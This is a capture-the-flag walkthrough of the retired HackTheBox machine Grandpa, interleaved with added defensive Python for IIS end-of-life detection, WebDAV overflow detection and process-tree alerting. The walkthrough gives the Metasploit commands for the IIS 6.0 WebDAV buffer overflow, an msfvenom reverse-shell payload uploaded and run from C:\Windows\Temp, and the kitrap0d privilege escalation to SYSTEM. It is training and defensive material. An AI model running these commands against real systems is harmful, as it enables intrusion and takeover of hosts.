Grandpa HackTheBox WalkThrough
This is the Grandpa HackTheBox machine walkthrough and the 9th machine of our OSCP-like HTB boxes series. In this writeup, I have demonstrated step by step how I rooted the Grandpa HTB machine. Before starting, let us know something about this machine. It is a Windows box with IP address 10.10.10.14 and difficulty "easy" assigned by its maker. This machine is currently retired, so you will require a VIP subscription at hackthebox.eu to access it. First of all, connect your PC to the HTB VPN and confirm your connectivity with the Grandpa machine by pinging the IP 10.10.10.14. If all goes well, start hacking. As usual, I started by scanning the machine. I used Nmap (a port scanner) for this task and the result is below:
$sudo nmap -sC -sV -p- -oN full_scan.nmap 10.10.10.14
Nmap revealed that only port 80 is open and that an IIS web server is running with version 6.0, which is a very outdated version; the current version of IIS is 10.0, so there is a good chance of available exploits. Looking up the version in searchsploit (an exploit-db querying tool) listed a good number of potential exploits. Among these, the most trusted one is the Remote Buffer Overflow, because this exploit can give us a remote shell very easily.
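From the defender's side, the same scan output is an exposure inventory: an IIS 6.0 banner means Windows Server 2003, which left extended support in July 2015. The following script is an added example, not part of the original walkthrough. It parses nmap's normal (-oN) output, extracts the IIS version and the WebDAV-related methods nmap's http-methods script reports, and flags any IIS release below a configurable minimum. The scan text is constructed for the example (modelled on the scan above, not copied from it), and the 7.0 threshold is an assumption.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of nmap -oN output for a host exposing only port 80 with
# IIS 6.0. Not the walkthrough's own scan; built to exercise the parser.
SAMPLE_SCAN = """\
# Nmap 7.80 scan initiated as: nmap -sC -sV -p- -oN full_scan.nmap 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.045s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
# Nmap done -- 1 IP address (1 host up) scanned in 120.55 seconds
"""

# One "port/proto state service version" line of nmap's normal output.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
IIS_VERSION = re.compile(r"Microsoft IIS httpd (?P<ver>\d+(?:\.\d+)?)")
RISKY_METHODS = re.compile(r"Potentially risky methods: (?P<methods>.+)$")

# Assumption: IIS 6.0 ships with Windows Server 2003 (end of extended support
# July 2015), so anything below 7.0 is treated as end-of-life here.
MIN_SUPPORTED_IIS = 7.0


@dataclass
class Finding:
    port: int
    version: str
    eol: bool
    risky_methods: List[str]


def parse_iis_findings(scan_text: str, min_supported: float = MIN_SUPPORTED_IIS) -> List[Finding]:
    """Return one Finding per open port whose version banner identifies IIS."""
    findings: List[Finding] = []
    current: Optional[Finding] = None
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = None  # script output below belongs to this port only
            v = IIS_VERSION.search(m.group("version"))
            if m.group("state") == "open" and v:
                ver = v.group("ver")
                current = Finding(int(m.group("port")), ver, float(ver) < min_supported, [])
                findings.append(current)
            continue
        r = RISKY_METHODS.search(line)
        if r and current is not None:
            current.risky_methods = r.group("methods").split()
    return findings


if __name__ == "__main__":
    for f in parse_iis_findings(SAMPLE_SCAN):
        status = "END-OF-LIFE" if f.eol else "supported"
        print(f"port {f.port}: IIS {f.version} ({status}); risky methods: {' '.join(f.risky_methods)}")
```

Run it against a real `full_scan.nmap` by reading the file into `parse_iis_findings`; a hit with `eol=True` and PROPFIND in the method list is the combination this box exposes.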
Searching Available Exploit
$searchsploit IIS 6.0
When I searched for this exploit in Metasploit, I found it in the module named exploit/windows/iis/iis_webdav_scstoragepathfromurl. Using this module I got a user shell very easily without much effort. For more info about this exploit check this link.
Note: This is a buffer overflow exploit, so once the machine has been exploited with it, it usually needs to be reset before another user can run the exploit again. So if you want to get a shell again you have to reset the machine. This is because the exploit may kill the vulnerable process.
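The bug this module targets lives in IIS 6.0's WebDAV handling of the If: header of a PROPFIND request, which is what a network-side check can key on: a legitimate WebDAV client sends a short If: header carrying a lock token or ETag, while the overflow needs a long one. The detector below is an added example, not code from the walkthrough or from Metasploit. It parses raw HTTP request heads (as a proxy or IDS tap would capture them) and flags PROPFIND requests whose If: header is oversized or contains non-ASCII bytes. The request samples are constructed, and the 256-byte threshold is an assumption to tune for your environment.

```python
from typing import Dict, List, Optional, Tuple

# Assumption for this example: a legitimate WebDAV client's If: header holds a
# lock token or ETag and stays well under this many bytes.
MAX_IF_HEADER_LEN = 256


def parse_request(raw: bytes) -> Optional[Tuple[str, str, Dict[str, str]]]:
    """Split a raw HTTP/1.x request head into (method, target, headers).
    Returns None when the request line is malformed."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].decode("latin-1").split(" ")
    if len(parts) != 3:
        return None
    method, target, _version = parts
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        # latin-1 maps every byte to one code point, so high bytes survive
        name, sep, value = line.decode("latin-1").partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def inspect_webdav_request(raw: bytes) -> Optional[str]:
    """Return a reason when the request has the shape of a ScStoragePathFromUrl
    overflow attempt (PROPFIND with an abnormal If: header), else None."""
    parsed = parse_request(raw)
    if parsed is None:
        return "malformed request line"
    method, _target, headers = parsed
    if method != "PROPFIND" or "if" not in headers:
        return None
    if_header = headers["if"]
    if len(if_header) > MAX_IF_HEADER_LEN:
        return f"PROPFIND with oversized If header ({len(if_header)} bytes)"
    if any(ord(c) > 0x7F for c in if_header):
        return "PROPFIND If header contains non-ASCII bytes"
    return None


def scan_requests(requests: List[bytes]) -> List[Tuple[int, str]]:
    """Run the check over captured request heads; returns (index, reason) hits."""
    hits: List[Tuple[int, str]] = []
    for i, raw in enumerate(requests):
        reason = inspect_webdav_request(raw)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed request heads (not captured from the box).
BENIGN_PROPFIND = (
    b"PROPFIND /docs/ HTTP/1.1\r\nHost: 10.10.10.14\r\nDepth: 1\r\n"
    b"If: (<opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>)\r\n\r\n"
)
SUSPICIOUS_PROPFIND = (
    b"PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\n"
    b"If: <http://localhost/" + b"a" * 600 + b">\r\n\r\n"
)
PLAIN_GET = b"GET / HTTP/1.1\r\nHost: 10.10.10.14\r\n\r\n"
SAMPLE_REQUESTS = [BENIGN_PROPFIND, SUSPICIOUS_PROPFIND, PLAIN_GET]

if __name__ == "__main__":
    for idx, why in scan_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: {why}")
```

The structural fix on the server is not a signature at all: on IIS 6.0 the WebDAV extension can be set to Prohibited under Web Service Extensions in IIS Manager, and a host still running IIS 6.0 should be migrated off Windows Server 2003 regardless.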
Getting User Shell
msf5 > search ScStoragePathFromUrl
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.10
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
meterpreter > sysinfo
You can see we have easily got a user shell. When I tried to grab the user flag it gave me access denied. Maybe it needs a higher privilege level to access the user.txt file, so I tried to escalate the privilege to admin.
To escalate the privilege to administrator we first have to find a privilege escalation vector. Since we are inside the meterpreter shell, I used multi/recon/local_exploit_suggester (a post-exploitation module that searches for possible kernel exploits). The multi/recon/local_exploit_suggester module searches for kernel exploits whose patches are not installed on the victim machine.
Finding PrivEsc Vector
meterpreter > run multi/recon/local_exploit_suggester
Local Exploit Suggester listed 6 exploits that could be used to get an admin shell. I tried each of them one by one and every exploit failed to execute, giving me an access denied error. When I tried to upgrade the shell using the shell command of meterpreter, the shell died very soon. This may be because we did not have a fully upgraded meterpreter shell.
I think this was the reason we could not capture the user flag and got permission denied. To solve this problem I created a new meterpreter shell from the existing meterpreter shell. When I got the new meterpreter shell, I ran all the kernel exploits listed by local_exploit_suggester again. After running the exploits again I found two exploits that could easily give me an administrator shell. So here our PrivEsc vector is
To create a new meterpreter shell I did the following things.
1. Created a msfvenom payload.
2. Changed the directory to C:\Windows\Temp (a publicly writeable directory) on the Grandpa box.
3. Uploaded shell.exe to the Temp folder using the upload command of meterpreter.
4. Started a multi/handler listener in msfconsole.
5. Executed the shell.exe payload using the execute meterpreter command.
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4321 -f exe > shell.exe
Here I have used a 32-bit payload because the Grandpa machine has a 32-bit architecture.
Uploading & Executing
meterpreter > cd "C:\Windows\Temp"
meterpreter > upload /home/deepak/HTB/Boxes/Grandpa/shell.exe
meterpreter > execute -f shell.exe
Getting Upgraded User Shell
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > set LHOST 10.10.14.10
msf5 exploit(multi/handler) > exploit
So we have upgraded our meterpreter shell to a fully functional meterpreter shell. Let us escalate the privilege to SYSTEM.
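The upgrade procedure above leaves a clear host-side trail: the IIS worker process (w3wp.exe) spawning a command interpreter, and an executable dropped into C:\Windows\Temp being launched by that same worker. The rule below is an added example, not part of the walkthrough, showing how a defender would flag both from process-creation telemetry. The events are constructed in a simplified Sysmon/EDR shape, and the list of writable directories and the rule names are assumptions.

```python
import ntpath
from typing import Dict, Iterable, List, Tuple

# Constructed process-creation events (simplified Sysmon/EDR shape), built for
# this example rather than captured from the box.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 1204, "image": r"C:\WINDOWS\system32\inetsrv\w3wp.exe",
     "parent_image": r"C:\WINDOWS\system32\svchost.exe"},
    {"pid": 1880, "image": r"C:\WINDOWS\system32\cmd.exe",
     "parent_image": r"C:\WINDOWS\system32\inetsrv\w3wp.exe"},
    {"pid": 2016, "image": r"C:\WINDOWS\Temp\shell.exe",
     "parent_image": r"C:\WINDOWS\system32\inetsrv\w3wp.exe"},
    {"pid": 2244, "image": r"C:\WINDOWS\system32\notepad.exe",
     "parent_image": r"C:\WINDOWS\explorer.exe"},
    {"pid": 2310, "image": r"C:\WINDOWS\Temp\installer_stage.exe",
     "parent_image": r"C:\WINDOWS\system32\msiexec.exe"},
]

# w3wp.exe is the IIS worker process; a request handler has no business
# launching a command interpreter or running binaries from a temp directory.
WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Directories any local account can write to (assumed list for this example;
# C:\Windows\Temp is the one used in the walkthrough).
WRITABLE_DIRS = [r"c:\windows\temp", r"c:\temp"]


def _under(path: str, directories: List[str]) -> bool:
    """Case-insensitive 'path lies inside one of directories' check."""
    p = path.lower()
    return any(p.startswith(d.rstrip("\\") + "\\") for d in directories)


def classify(event: Dict[str, object]) -> List[str]:
    """Return the rule names the event matches (empty list if none)."""
    image = str(event["image"])
    parent = ntpath.basename(str(event["parent_image"])).lower()
    child = ntpath.basename(image).lower()
    matches: List[str] = []
    if parent in WEB_WORKERS and child in SHELLS:
        matches.append("web-worker-spawned-shell")
    if parent in WEB_WORKERS and _under(image, WRITABLE_DIRS):
        matches.append("web-worker-ran-binary-from-writable-dir")
    elif _under(image, WRITABLE_DIRS):
        # Lower-severity hygiene signal: still worth an entry in the queue.
        matches.append("binary-from-writable-dir")
    return matches


def alerts(events: Iterable[Dict[str, object]]) -> List[Tuple[int, str]]:
    """Flatten matches into (pid, rule) pairs in event order."""
    out: List[Tuple[int, str]] = []
    for ev in events:
        for rule in classify(ev):
            out.append((int(ev["pid"]), rule))
    return out


if __name__ == "__main__":
    for pid, rule in alerts(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The first two rules are the high-confidence ones: a web worker should only ever spawn the handlers it is configured for, so either match is worth an immediate look, while the third mostly catches installers and is there to show where a tuning allow-list would go.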
exploit/windows/local/ms10_015_kitrap0d was one of the two modules that gave me an admin shell.
Getting Root Shell
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.10
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
meterpreter > getuid
We are NT AUTHORITY\SYSTEM now, which is the highest privilege in the Windows OS. Let us capture the user and root flags. Since our cmd shell dies very fast, we can use the search command to find the flags while we are in the meterpreter shell.
Capture User Flag
meterpreter > search -f user.txt C:\\
meterpreter > cat "c:\Documents and Settings\Harry\Desktop\user.txt"
Capture Root Flag
meterpreter > search -f root.txt C:\\
meterpreter > cat "c:\Documents and Settings\Administrator\Desktop\root.txt"
This was how I rooted the Grandpa HackTheBox machine. I learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. Write about your experience in the comment section. For any suggestion or query related to the walkthrough feel free to write to us at [email protected].
Next retired machine walkthrough is Granny.